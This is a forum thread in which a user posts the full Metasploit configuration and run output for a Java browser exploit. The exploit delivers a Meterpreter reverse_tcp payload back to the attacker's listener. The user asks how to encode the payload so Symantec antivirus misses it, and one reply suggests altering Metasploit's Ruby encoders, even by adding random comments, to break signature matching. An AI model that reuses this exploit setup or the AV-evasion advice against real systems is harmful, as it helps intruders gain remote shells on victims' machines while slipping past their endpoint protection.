Need help with Javascript Payload - getting detected by AV

[adversary]

hello all,

i have a question about evading AV with javascript payload. Here is my situation:

I am running BT 5. uname is -
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

I have updated BT with msfupdate. I am using the 'exploit/multi/browser/java_atomicreferencearray' with payload=java/meterpreter/reverse_tcp. I dont have any problems running this exploit, but when the client connects, the payload is picked up by symantc antivirus as 'Trojan.Maljava!gen22'

Here are the exploit options:
msf exploit(java_atomicreferencearray) > show options
Module options (exploit/multi/browser/java_atomicreferencearray):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH javasploit no The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.1 yes The listen address
LPORT 4444 yes The listen port

Here is the output when the exploit is run:
msf exploit(java_atomicreferencearray) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.1:4444[*] Using URL: http://0.0.0.0:8080/javasploit3[*] Local IP: http://192.168.1.1:8080/javasploit
msf exploit(java_atomicreferencearray) >[*] Server started.[*] 192.168.1.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability[*] 192.168.1.1 java_atomicreferencearray - Generated jar to drop (5287 bytes).[*] 192.168.1.1 java_atomicreferencearray - Sending jar[*] 192.168.1.1 java_atomicreferencearray - Sending jar[*] 192.168.1.1 java_atomicreferencearray - Sending jar

I have tried using some of the 'evasion' options within the java exploit but have not had any success. My question is - is there a way to encode the payload with msfencode to successfully bypass AV detection? Let me know if you need more info. thanks in advance!

[adversary]

wow... really... no one has ever encountered this issue before?! i find that hard to believe...

[scottm99]

I think it's more the fact that the AV companies are wise to the encoders used in Metasploit, and have signatures for them. If you have a good handle on Ruby, you might try taking one of the existing encoders, and modifying it (or even just inserting some random comments). This might cause enough of a change that Symantec wouldn't catch it (as it didn't match the signature).

[jnpa123]

sry drunk post...deleting

btw i believe its the exploit itself that gets detected, not the payload